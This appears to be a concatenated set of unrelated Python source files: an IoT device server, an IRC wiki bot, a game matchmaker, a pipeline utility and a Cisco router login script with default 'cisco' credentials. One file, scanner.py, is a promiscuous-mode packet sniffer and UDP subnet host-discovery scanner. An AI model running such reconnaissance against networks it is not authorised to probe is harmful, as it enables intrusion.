tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2)))
if device.motion_instance is not None:
if device.button_instance is None:
t.append(tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1)))
t.append(tlvlib.create_set_vector_tlv(device.motion_instance,
tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2)))
try:
device.log.debug("requesting periodic data: %s",tlvlib.get_tlv_short_info(t))
return device.send_tlv(t)
except socket.timeout:
device.log.error("failed to fetch from device (time out)")
return False
def setup(self):
# discover and - if it is a NBR then find serial radio and configure the
# beacons to something good!
d = tlvlib.discovery(self.router_host)
print "Product label:", d[0][0]
if d[0][1] != tlvlib.INSTANCE_BORDER_ROUTER:
print "Error - could not find the radio - not starting the device server"
return False
i = 1
for data in d[1]:
print "Instance:",i , " type: %016x"%data[0], " ", data[1]
# check for radio and if found - configure beacons
if data[0] == tlvlib.INSTANCE_RADIO:
self.radio_instance = i
elif data[0] == tlvlib.INSTANCE_ROUTER:
self.router_instance = i
t = tlvlib.create_get_tlv(i, tlvlib.VARIABLE_NETWORK_ADDRESS, 2)
enc, t = tlvlib.send_tlv(t, self.router_host)
self.router_address = socket.inet_ntop(socket.AF_INET6, t[0].value)
print "\tRouter address:", self.router_address
self.router_prefix = socket.inet_ntop(socket.AF_INET6, t[0].value[0:8] + binascii.unhexlify("0000000000000000"))
#while self.router_prefix.endswith("::"):
# self.router_prefix = self.router_prefix[0:len(self.router_prefix) - 1]
print "\tNetwork prefix:",self.router_prefix
if self.device_server_host:
self.udp_address = self.device_server_host
else:
self.udp_address = self._lookup_device_host(self.router_prefix, socket.inet_ntop(socket.AF_INET6, t[0].value[0:8] + binascii.unhexlify("0000000000000001")))
print "\tNetwork address:",self.udp_address
elif data[0] == tlvlib.INSTANCE_BORDER_ROUTER_MANAGEMENT:
self.brm_instance = i
elif data[0] == tlvlib.INSTANCE_NETWORK_STATISTICS:
self.nstats_instance = i
i = i + 1
if not self.radio_instance:
print "Error - could not find the radio instance - not starting the device server"
return False
if not self.router_instance:
print "Error - could not find the router instance - not starting the device server"
return False
# Setup socket to make sure it is possible to bind the address
try:
self._sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind((self.udp_address, self.udp_port))
#self._sock.bind(('', self.udp_port))
self._sock.settimeout(1.0)
self._sock4 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self._sock4.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock4.bind(('localhost', self.udp_port))
self._sock4.settimeout(1.0)
except Exception as e:
print e
print "Error - could not bind to the address", self.udp_address
return False
# set radio channel and panid
self.set_channel_panid()
# set-up beacon to ...
IPv6Str = binascii.hexlify(socket.inet_pton(socket.AF_INET6, self.udp_address))
BEACON = "fe02010a020090da01%08x"%self.location + "18020090da03" + IPv6Str + "%4x"%self.udp_port + "000000"
beacon_payload = binascii.unhexlify(BEACON)
print "Setting beacon with length",len(beacon_payload),"in instance", self.radio_instance
print "\t",BEACON
t = tlvlib.create_set_vector_tlv(self.radio_instance,
tlvlib.VARIABLE_RADIO_BEACON_RESPONSE,
0, 0, len(beacon_payload) / 4,
beacon_payload)
enc, t = tlvlib.send_tlv(t, self.router_host)
# print "Result:"
# tlvlib.print_tlv(t[0])
return True
def stop(self):
self.running = False
# sys.exit(0)
def wakeup(self, host, time=60):
device = self.get_device(host)
if device is not None:
self._wakeup_device(device, time)
elif host == "all" or host == "*":
for dev in self.get_devices():
if dev.is_sleepy_device():
self._wakeup_device(dev, time)
else:
print "could not find device with address",host
def _wakeup_device(self, device, time):
if device.is_sleepy_device() and device.sleep_instance is not None:
print "requesting [" + device.address + "] to wakeup"
t = tlvlib.create_set_tlv32(device.sleep_instance,
tlvlib.VARIABLE_SLEEP_AWAKE_TIME_WHEN_NO_ACTIVITY,
time * 1000L)
device.send_tlv(t)
else:
print device.address,"is not a sleepy device"
def set_channel_panid(self):
# set radio channel
t1 = tlvlib.create_set_tlv32(self.radio_instance,
tlvlib.VARIABLE_RADIO_CHANNEL,
self.radio_channel)
# set radio PAN ID
t2 = tlvlib.create_set_tlv32(self.radio_instance,
tlvlib.VARIABLE_RADIO_PAN_ID,
self.radio_panid)
tlvlib.send_tlv([t1,t2], self.router_host)
def _udp_receive(self, sock):
print "UDP Receive - on socket: ", sock
while self.running:
try:
data, addr = sock.recvfrom(1024)
if not self.running:
return
# print "Received from ", addr, binascii.hexlify(data)
if len(addr) > 2:
host, port, _, _ = addr
else:
host, port = addr
device = self.get_device(host)
enc = tlvlib.parse_encap(data)
if enc.error != 0:
self.log.error("[%s] RECV ENCAP ERROR %s", host, str(enc.error))
elif enc.payload_type == tlvlib.ENC_PAYLOAD_TLV:
self._process_incoming_tlvs(sock, host, port, device, enc, data[enc.size():])
else:
self.log.error("[%s] RECV ENCAP UNHANDLED PAYLOAD %s", host, str(enc.payload_type))
except socket.timeout:
pass
def serve_forever(self):
# Initialize if not already initialized
if not self.router_instance:
if not self.setup():
# Initialization failed
return False
self.log.info("Device server started at [%s]:%d", self.udp_address, self.udp_port)
self.running = True
# do device management periodically
t1 = threading.Thread(target=self._manage_devices)
t1.daemon = True
t1.start()
# sock4 socket
t2 = threading.Thread(target=self._udp_receive, args=[self._sock4])
t2.daemon = True
t2.start()
self._udp_receive(self._sock)
t2.join()
t1.join()
self._sock.close()
self._sock4.close()
exit(0)
def _process_incoming_tlvs(self, sock, host, port, device, enc, data):
tlvs = tlvlib.parse_tlvs(data)
if device is not None:
last_seeen = device.last_seen
device.last_seen = time.time();
device.log.debug("RECV %s",tlvlib.get_tlv_short_info(tlvs))
else:
last_seen = time.time()
self.log.debug("[%s] RECV %s",host,tlvlib.get_tlv_short_info(tlvs))
ping_device = False
dev_watchdog = None
dev_type = 0
# print " Received TLVs:"
# tlvlib.print_tlvs(tlvs)
for tlv in tlvs:
if tlv.error != 0:
if device is not None:
device.log.error("Received error (" + str(tlv.error) + "):")
else:
self.log.error("[%s] Received error:", host)
tlvlib.print_tlv(tlv)
elif tlv.instance == 0 and tlv.op == tlvlib.TLV_GET_RESPONSE:
if tlv.variable == tlvlib.VARIABLE_OBJECT_TYPE:
dev_type = tlv.int_value
elif tlv.variable == tlvlib.VARIABLE_UNIT_BOOT_TIMER:
pass
elif tlv.variable == tlvlib.VARIABLE_TIME_SINCE_LAST_GOOD_UC_RX:
if device is not None and last_seen - time.time() > 55:
ping_device = True
elif tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
dev_watchdog = tlv.int_value
if not device:
if dev_watchdog is not None or self.grab_all == 0:
if dev_type == tlvlib.INSTANCE_BORDER_ROUTER:
# Do not try to grab the border router
pass
elif not self.is_device_acceptable(host, dev_type):
self.log.debug("[%s] IGNORING device of type 0x%016x that could be taken over", host, dev_type)
else:
# Unknown device - do a grab attempt
if dev_watchdog is not None:
self.log.debug("[%s] FOUND new device of type 0x%016x that can be taken over - WDT = %d", host, dev_type, dev_watchdog)
if self.grab_device(host):
device = self._add_device(sock, host, port)
device.next_update = time.time() + self.watchdog_time - self.guard_time
self.discover_device(device)
elif device.is_discovered():
# time.sleep(0.005)
device._process_tlvs(tlvs)
if not device.is_sleepy_device() and ping_device and device.get_pending_packet_count() == 0:
t = tlvlib.create_get_tlv64(0, tlvlib.VARIABLE_UNIT_BOOT_TIMER)
device.send_tlv(t)
device._flush()
else:
self.discover_device(device)
def usage():
print "Usage:",sys.argv[0],"[-b bind-address] [-a host] [-c channel] [-P panid] [-t node-address-list] [-g 0/1] [-nocli] [device]"
exit(0)
if __name__ == "__main__":
# stuff only to run when not called via 'import' here
manage_device = None
arg = 1
start_cli = True
logging.basicConfig(format='%(asctime)s [%(name)s] %(levelname)s - %(message)s', level=logging.DEBUG)
server = DeviceServer()
while len(sys.argv) > arg + 1:
if sys.argv[arg] == "-a":
server.router_host = sys.argv[arg + 1]
elif sys.argv[arg] == "-c":
server.radio_channel = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-P":
server.radio_panid = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-b":
server.device_server_host = sys.argv[arg + 1]
elif sys.argv[arg] == "-g":
server.grab_all = tlvlib.decodevalue(sys.argv[arg + 1])
elif sys.argv[arg] == "-t":
server._accept_nodes = tuple(sys.argv[arg + 1].split(','))
elif sys.argv[arg] == "-nocli":
start_cli = False
else:
break
arg += 2
if len(sys.argv) > arg:
if sys.argv[arg] == "-h":
usage()
if sys.argv[arg].startswith("-"):
usage()
manage_device = sys.argv[arg]
arg += 1
if len(sys.argv) > arg:
print "Too many arguments"
exit(1)
try:
if not server.setup():
print "No border router found. Please make sure a border router is running!"
sys.exit(1)
except socket.timeout:
print "No border router found. Please make sure a border router is running!"
sys.exit(1)
except Exception as e:
print e
print "Failed to connect to border router."
sys.exit(1)
if start_cli:
dscli.start_cli(server)
if manage_device:
server.add_device(manage_device)
server.serve_forever()
if server.running:
server.log.error("*** device server stopped")
|
maintainer.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
A wiki-maintainer script that shares tasks between workers, requires no intervention.
This script requires the Python IRC library http://python-irclib.sourceforge.net/
Warning: experimental software, use at your own risk
"""
__version__ = '$Id: 55d29d9f38fc751e8f84d9b459641cdd02b25d25 $'
# Author: Balasyum
# http://hu.wikipedia.org/wiki/User:Balasyum
import random
import thread
import threading
import time
import rciw
import censure
import wikipedia as pywikibot
import externals
externals.check_setup('irclib')
from ircbot import SingleServerIRCBot
from irclib import nm_to_n
ver = 1
site = pywikibot.getSite()
site.forceLogin()
class rcFeeder(SingleServerIRCBot):
def __init__(self, channel, nickname, server, port=6667):
SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
self.channel = channel
self.rcbot = rciw.IWRCBot(site)
self.tasks = []
def on_nicknameinuse(self, c, e):
c.nick(c.get_nickname() + "_")
def on_welcome(self, c, e):
c.join(self.channel)
def on_privmsg(self, c, e):
pass
def on_pubmsg(self, c, e):
try:
msg = unicode(e.arguments()[0],'utf-8')
except UnicodeDecodeError:
return
name = msg[8:msg.find(u'14',9)]
if 'rciw' in self.tasks:
self.rcbot.addQueue(name)
if 'censure' in self.tasks:
thread.start_new_thread(censure.checkPage, (name, True))
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def on_quit(self, e, cmd):
pass
class MaintcontBot(SingleServerIRCBot):
def __init__(self, nickname, server, port=6667):
SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
feederThread = threading.Thread(target=self.feederBot)
feederThread.setDaemon(True)
feederThread.start()
def feederBot(self):
self.feed = rcFeeder('#%s.%s' % (site.language(), site.family.name),
site.loggedInAs(), "irc.wikimedia.org")
self.feed.start()
def on_nicknameinuse(self, c, e):
c.nick("mainter" + str(random.randrange(100, 999)))
def on_welcome(self, c, e):
self.connection.privmsg("maintcont",
"workerjoin %s.%s %s"
% (site.language(), site.family.name,
str(ver)))
def on_privmsg(self, c, e):
nick = nm_to_n(e.source())
c = self.connection
cmd = e.arguments()[0]
do = cmd.split()
if do[0] == "accepted":
print "Joined the network"
thread.start_new_thread(self.activator,())
elif do[0] == "tasklist" and len(do) > 1:
self.feed.tasks = do[1].split('|')
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def activator(self):
while True:
self.connection.privmsg("maintcont", "active")
time.sleep(10)
class Maintainer:
def __init__(self):
controllThread = threading.Thread(target=self.controllBot)
controllThread.setDaemon(True)
controllThread.start()
while True:
raw_input()
def controllBot(self):
bot = MaintcontBot("mainter%s" % str(random.randrange(100, 999)),
"irc.freenode.net")
bot.start()
if __name__ == "__main__":
Maintainer()
|
main.py
|
from minecraft import Minecraft
from ircd import IRC
import threading
thread_lock = threading.Lock()
def main():
mc = Minecraft()
irc = IRC()
mc.set_irc(irc)
irc.set_mc(mc)
mc.set_thread_lock(thread_lock)
irc.set_thread_lock(thread_lock)
th = threading.Thread(target=irc.run)
th.start()
mc.run() # keep things running
irc.run()
if __name__ == "__main__":
main()
|
scanner.py
|
import socket
import os
import struct
import threading
import time
from netaddr import IPNetwork, IPAddress
from ctypes import *
"""
This script sniffs network packets received to a given host and decodes the
packets to show packet type, source, and destination in human readable form.
Note: Promiscuous mode is needed which requires administrative privileges
on Windows or root on Linux.
"""
# Host to listen on
if os.name == "nt":
# Windows
HOST = "192.168.1.114"
SOCKET_PROTOCOL = socket.IPPROTO_IP
else:
HOST = "192.168.1.115"
SOCKET_PROTOCOL = socket.IPPROTO_ICMP
# Subnet to target
subnet = "192.168.0.0/24"
# String to print for ICMP responses
magic_message = "PYTHON"
class IP (Structure):
_fields_ = [
("ihl", c_uint8, 4),
("version", c_uint8, 4),
("tos", c_uint8),
("len", c_uint16),
("id", c_uint16),
("offset", c_uint16),
("ttl", c_uint8),
("protocol_num", c_uint8),
("sum", c_uint16),
("src", c_uint32),
("dst", c_uint32)
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# Map protocol constants to their names
# TODO: Map remaining IP protocol numbers.
self.protocol_map = {
1: "ICMP",
2: "IGMP",
6: "TCP",
17: "UDP"
}
# Human readable IP addresses
self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))
# Human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP (Structure):
_fields_ = [
("type", c_uint8),
("code", c_uint8),
("checksum", c_uint16),
("unused", c_uint16),
("next_hop_mtu", c_uint16)
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer):
pass
def udp_sender(subnet, magic_message):
time.sleep(5) # Sleep for 5 seconds
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message, ("{}".format(ip, 65212)))
except:
pass
def main():
# Create a raw socket and bind it to the public interface
# Windows allows us to sniff all incoming packets regardless of protocol.
# Linux forces us to specify that we are sniffing ICMP.
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, SOCKET_PROTOCOL)
sniffer.bind((HOST, 0))
# Set the socket options to include IP headers in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# If we are using Windows, we need to send an IOCTL to turn on promiscuous mode.
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
try:
print("Sniffing {} packets:\n".format(sniffer.getsockname()))
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))
t.start()
while True:
# Read in a packet
# TODO: Linux not sniffing packets.
raw_buffer = sniffer.recvfrom(65565)[0]
# Create an IP header from the first 20 bytes of the buffer
ip_header = IP(raw_buffer[0:20])
# Print out the protocol that was detected and the hosts
print("Protocol: {} {} -> {}".format(ip_header.protocol, ip_header.src_address, ip_header.dst_address))
# Grab the packet if it is ICMP
if ip_header.protocol == "ICMP":
# Calculate where the ICMP packet starts.
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + sizeof(ICMP)]
# Create our ICMP structure
icmp_header = ICMP(buf)
print("ICMP -> Type {} Code: {}".format(icmp_header.type, icmp_header.code))
# Check for the TYPE 3 and CODE
if (icmp_header.code == 3) and (icmp_header == 3):
# Make sure host is in our target subnet
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# Make sure it has our magic message.
if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:
print("Host Up: {}".format(ip_header.src_address))
# Handle CTRL-C
except KeyboardInterrupt:
# If we are using Windows, turn off promiscuous mode.
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
if __name__ == '__main__':
main()
|
pipeline.py
|
import time
from collections import OrderedDict
from itertools import chain, cycle
from threading import Thread
from .queue import AsyncQueue, Signal, StubQueue, VoidQueue, is_stop_signal
from .timer import TimerGroup, IncrementalTimer
class PipelineStep:
def __init__(self):
self.input_queue = None
self.output_queue = VoidQueue()
self.working = False
self.timers = TimerGroup()
self.total_time = IncrementalTimer()
self.own_time = IncrementalTimer()
self._start_t = None
self._thread = None
def process(self, item):
raise NotImplementedError
def end(self):
pass
def setup(self):
pass
def start(self):
if self.input_queue is None or self.output_queue is None:
raise Exception("No input or output queue")
if self._thread is not None:
raise Exception("Thread is already running")
self._thread = Thread(target=self._run)
self._thread.start()
self.working = True
def join(self):
print("finishing {}".format(self))
self.input_queue.put(Signal.STOP)
self._thread.join()
self._thread = None
self.working = False
def _run(self):
self._start_t = time.time()
self.setup()
self.total_time = IncrementalTimer()
self.own_time = IncrementalTimer()
while True:
self.total_time.tick()
item = self.input_queue.get()
if self._check_output(item):
break
self.own_time.tick()
output = self.process(item)
self.own_time.tock()
if self._check_output(output):
break
self.total_time.tock()
self.input_queue.task_done()
self.output_queue.put(output)
self.input_queue.close()
self.end()
self.working = False
def _check_output(self, item):
if is_stop_signal(item):
self.output_queue.put(item)
return True
return False
class AsyncPipeline:
def __init__(self):
self.steps = OrderedDict()
self.sync_steps = OrderedDict()
self.async_step = []
self._void_queue = VoidQueue()
self._last_step = None
self._last_parallel = False
def add_step(self, name, new_pipeline_step, max_size=100, parallel=True):
new_pipeline_step.output_queue = self._void_queue
if self._last_step:
if parallel or self._last_parallel:
queue = AsyncQueue(maxsize=max_size)
else:
queue = StubQueue()
self._last_step.output_queue = queue
new_pipeline_step.input_queue = queue
else:
new_pipeline_step.input_queue = self._void_queue
if parallel:
self.steps[name] = new_pipeline_step
else:
self.sync_steps[name] = new_pipeline_step
self._last_step = new_pipeline_step
self._last_parallel = parallel
def run(self):
for step in self.steps.values():
if not step.working:
step.start()
self._run_sync_steps()
def close(self):
for step in self.steps.values():
step.input_queue.put(Signal.STOP_IMMEDIATELY)
for step in self.steps.values():
step.join()
def print_statistics(self):
for name, step in chain(self.sync_steps.items(), self.steps.items(), ):
print("{} total: {}".format(name, step.total_time))
print("{} own: {}".format(name, step.own_time))
def _run_sync_steps(self):
"""Run steps in main thread"""
if not self.sync_steps:
while not self._void_queue.finished:
pass
return
for step in self.sync_steps.values():
step.working = True
step.setup()
for step in cycle(self.sync_steps.values()):
step.total_time.tick()
item = step.input_queue.get()
if is_stop_signal(item):
step.input_queue.close()
step.output_queue.put(item)
break
step.own_time.tick()
output = step.process(item)
step.own_time.tock()
if is_stop_signal(output):
step.input_queue.close()
step.output_queue.put(output)
break
step.total_time.tock()
step.output_queue.put(output)
for step in self.sync_steps.values():
step.working = False
step.end()
|
matchmaker_service.py
|
import firebase_admin
from firebase_admin import credentials, firestore
from game import Game
from game_engine import messages
from game_engine.common import GameOptions, GameSchedule, STV_I18N_TABLE, ISODayOfWeek, log_message
from game_engine.database import Database
from game_engine.engine import Engine
from game_engine.firestore import FirestoreDB
from game_engine.matchmaker import MatchMakerInterface
from game_engine.matchmaker import MatchMakerError
from game_engine.twilio import TwilioSMSNotifier
from game_engine.twilio import SMSNotifier
from test_game import MockDatabase, MockPlayEngine
from google.cloud.firestore_v1.document import DocumentSnapshot
from typing import Text
import time
import threading
import datetime
from game_engine import events
from multiprocessing import Process
import multiprocessing
_FIRESTORE_PROD_CONF_JSON_PATH = ''
_TEST_FIRESTORE_INSTANCE_JSON_PATH = '../firebase/stv-game-db-test-4c0ec2310b2e.json'
json_config_path = _TEST_FIRESTORE_INSTANCE_JSON_PATH
_AMAZON_SQS_PROD_CONF_JSON_PATH = '../amazon/stopthevirus.fifo.json'
_TEST_AMAZON_SQS_CONFIG_PATH = '../amazon/stopthevirus.fifo.json'
_TEST_TWILIO_SMS_CONFIG_PATH = '../twilio/stv-twilio-service-test.json'
def _twilio_client(game_id: Text) -> TwilioSMSNotifier:
return TwilioSMSNotifier(
json_config_path=_TEST_TWILIO_SMS_CONFIG_PATH,
game_id=game_id)
class MatchmakerService:
# Handles scheduling and communication with other services for starting games
# TDOO(David): Add function to run all games that are supposed to be running at start(in MVP/test)
def __init__(self, matchmaker: MatchMakerInterface, gamedb: Database, json_config_path: str = json_config_path,
region: str = "US", min_players: int = 5, is_mvp: bool = True, game_options: GameOptions = None):
self._matchmaker = matchmaker
self._gamedb = gamedb
self._min_players = min_players
self._region = region
self._is_mvp = is_mvp
self._stop = threading.Event()
self._daemon_started = False
self._game_options = game_options
def _get_sms_notifier(self, game_id: str) -> SMSNotifier:
return _twilio_client(game_id=game_id)
def _notify_players(self, game_id: Text, players: list, message: Text):
twilio = self._get_sms_notifier(game_id=game_id)
# iterate over players and get their phone numbers
recipient_phone_numbers = list(
map(lambda player: player.to_dict().get("phone_number"), players))
# filter out players with no phone number
filtered_phone_numbers = list(
filter(lambda number: not not number, recipient_phone_numbers))
twilio.send_bulk_sms(
message=message,
recipient_addresses=filtered_phone_numbers
)
log_message(message="Notified players with message:{}".format(
message), game_id=game_id)
def _play_game(self, game: Game, game_snap: DocumentSnapshot, players: list, game_dict: dict, is_test: bool = False):
log_message("Starting a game", game_id=game_dict.get(
"id"), additional_tags=game_dict)
if is_test:
database = MockDatabase()
engine = MockPlayEngine().CreateEngine(database)
else:
# NOTE(brandon): the game DB instance used by the matchmaker is for searching over all games. when we create
# a game instance, we also supply new game DB and engine objects that have the specific game ID.
database = FirestoreDB(
json_config_path=json_config_path, game_id=game._game_id)
engine = Engine(options=game._options,
game_id=game._game_id,
sqs_config_path=_TEST_AMAZON_SQS_CONFIG_PATH,
twilio_config_path=_TEST_TWILIO_SMS_CONFIG_PATH,
gamedb=database
)
try:
game_data = self._matchmaker.generate_tribes(
game_id=game._game_id, players=players, game_options=game._options, gamedb=database)
tribes = game_data['tribes']
message = messages.NOTIFY_GAME_STARTED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(
hashtag=game_dict.get('hashtag')),
game=game_dict.get('hashtag')
)
self._notify_players(game_id=game._game_id,
players=players, message=message)
if self._is_mvp:
# NOTE(brandon): changing to thread for now. can't pickle non-primitive engine object.
game_thread = threading.Thread(target=game.play, args=(
tribes[0], tribes[1], database, engine))
game_thread.start()
else:
# start on new GCP instance
pass
except MatchMakerError as e:
# Catches error from matchmaker algorithm
message = "Matchmaker Error: {}".format(e)
log_message(message=message,
game_id=game._game_id)
self._set_game_has_started(
game_snap=game_snap, game=game, value=False)
self._notify_players(game_id=game._game_id,
players=players, message=message)
self._reschedule_or_cancel_game(
game_snap=game_snap, game_dict=game_dict, players=players)
def _start_game(self, game: Game, game_snap: DocumentSnapshot, players: list, game_dict: dict, is_test: bool = False):
self._set_game_has_started(game_snap=game_snap, game=game)
self._play_game(game=game, game_snap=game_snap,
players=players, game_dict=game_dict, is_test=is_test)
def _set_game_has_started(self, game_snap: DocumentSnapshot, game: Game, value: bool = True):
field_updates = {
'game_has_started': value
}
try:
game_snap.reference.update(field_updates)
log_message(message="Set game_has_started field to {}".format(
value), game_id=game._game_id)
except Exception as e:
log_message(message="Error setting game document game_has_started field to {}: {}".format(
value, e), game_id=game._game_id)
raise RuntimeError(str(e))
def _reschedule_or_cancel_game(self, game_snap: DocumentSnapshot, game_dict: dict, players: list):
log_message(message="Rescheduling or cancelling game",
game_id=game_dict.get("id"))
now_date = datetime.datetime.utcnow().strftime('%Y-%m-%d')
if 'times_rescheduled' not in game_dict:
game_dict['times_rescheduled'] = 0
if 'max_reschedules' not in game_dict:
game_dict['max_reschedules'] = 1
if (game_dict.get("times_rescheduled") if game_dict.get("times_rescheduled") else 0) < game_dict.get("max_reschedules"):
# Reschedule the game by setting current UTC date to last_checked_date.
# Server will then not check the game until following week
# Assume times_rescheduled is optional and max_reschedules is True
times_rescheduled = game_dict["times_rescheduled"] + \
1 if game_dict.get("times_rescheduled") else 1
field_updates = {
'last_checked_date': now_date,
'times_rescheduled': times_rescheduled
}
try:
game_snap.reference.update(field_updates)
log_message(message="Game successfully rescheduled",
game_id=game_dict.get("id"))
schedule = STV_I18N_TABLE[self._region]
notif_message = messages.NOTIFY_GAME_RESCHEDULED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(
hashtag=game_dict.get('hashtag')),
game=game_dict.get("hashtag"),
reason="insufficient players",
date=schedule.nextweek_localized_string,
time=schedule.localized_time_string(
schedule.daily_challenge_start_time
)
)
self._notify_players(game_id=game_dict.get(
"id"), players=players, message=notif_message)
except Exception as e:
log_message(message="Error rescheduling game: {}".format(
e), game_id=game_dict.get("id"))
else:
self._cancel_game(game_snap=game_snap, players=players)
def _cancel_game(self, game_snap: DocumentSnapshot, players: list, reason: str = "insufficient players") -> None:
# Cancel the game
game_dict = game_snap.to_dict()
field_updates = {
'to_be_deleted': True,
}
game_snap.reference.update(field_updates)
log_message(
message="Cancelled the game (set to_be_deleted flag)", game_id=game_dict.get("id"))
notif_message = messages.NOTIFY_GAME_CANCELLED_EVENT_MSG_FMT.format(
header=messages.game_sms_header(hashtag=game_dict.get('hashtag')),
game=game_dict.get("hashtag"),
reason=reason
)
self._notify_players(game_id=game_dict.get(
"id"), players=players, message=notif_message)
def _check_start_time(self, schedule: GameSchedule,
now_dt_with_tz: datetime.datetime,
is_test: bool = False):
start_day = schedule.game_start_day_of_week.value
start_time = schedule.game_start_time
localized_time = now_dt_with_tz.astimezone(schedule.game_time_zone)
now_day = localized_time.isoweekday()
now_time = localized_time.time()
if is_test:
now_day = start_day
now_time = start_time
return now_day == start_day and now_time >= start_time
def _matchmaker_function(self, sleep_seconds: int = 60, is_test: bool = False):
log_message("Starting matchmaker for region={}".format(self._region))
while not self._stop.is_set():
games = self._gamedb.find_matchmaker_games(region=self._region)
if len(games) >= 1:
for game_snap in games:
game_dict = game_snap.to_dict()
players_stream = game_snap.reference.collection(
"players").stream()
players_list = []
for player in players_stream:
players_list.append(player)
if self._region in STV_I18N_TABLE:
schedule = STV_I18N_TABLE[self._region]
else:
schedule = STV_I18N_TABLE['US']
try:
now_utc = datetime.datetime.utcnow().strftime('%Y-%m-%d')
if self._check_start_time(schedule=schedule, now_dt_with_tz=datetime.datetime.now().astimezone(),
is_test=is_test) and now_utc != game_dict.get("last_checked_date"): # TODO: Do these checks in query
if game_dict["count_players"] >= self._min_players:
if self._game_options is None:
self._game_options = GameOptions(
game_schedule=schedule, game_wait_sleep_interval_sec=1 if is_test else 30)
g = Game(
game_id=game_dict["id"], options=self._game_options)
self._start_game(
game=g, game_snap=game_snap, players=players_list, game_dict=game_dict, is_test=is_test)
else:
self._reschedule_or_cancel_game(
game_snap=game_snap, game_dict=game_dict, players=players_list)
except Exception as e:
log_message(
f"Game {str(game_dict)} is corrupt: {str(e)} Cancelling.")
self._cancel_game(game_snap=game_snap, players=players_list,
reason="an internal data corruption error")
time.sleep(sleep_seconds)
log_message("Stopped matchmaker for region={}".format(self._region))
def start_matchmaker_daemon(self, sleep_seconds: int = 60, is_test: bool = False):
if not self._daemon_started and not self._stop.is_set():
self._thread = threading.Thread(
target=self._matchmaker_function, args=(sleep_seconds, is_test))
self._daemon_started = True
self._thread.start()
else:
log_message(
"Failed to start new matchmaker for region={} (matchmaker already running)".format(self._region))
def set_stop(self):
log_message(
"Received stop signal for matchmaker in region={}".format(self._region))
self._stop.set()
# Wait for thread to finish executing/sleeping. This may take a long time
self._thread.join()
self._daemon_started = False
def clear_stop(self):
self._stop.clear()
log_message(
"Cleared stop signal for matchmaker in region={}".format(self._region))
|
config_csr1000v.py
|
#!/usr/bin/env python3
# scripts/config_csr1000v.py
#
# Import/Export script for vIOS.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, sys, time
username = 'cisco'
password = 'cisco'
secret = 'cisco'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'Username:',
'\(config',
'>',
'#',
'Would you like to enter the'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline(username)
try:
handler.expect('Password:', timeout = expctimeout)
except:
print('ERROR: error waiting for "Password:" prompt.')
node_quit(handler)
return False
handler.sendline(password)
try:
j = handler.expect(['>', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for [">", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 1:
# Config mode detected, need to exit
handler.sendline('end')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif i == 2:
# Need higher privilege
handler.sendline('enable')
try:
j = handler.expect(['Password:', '#'])
except:
print('ERROR: error waiting for ["Password:", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
# Need do provide secret
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 3:
# Nothing to do
return True
elif i == 4:
# First boot detected
handler.sendline('no')
try:
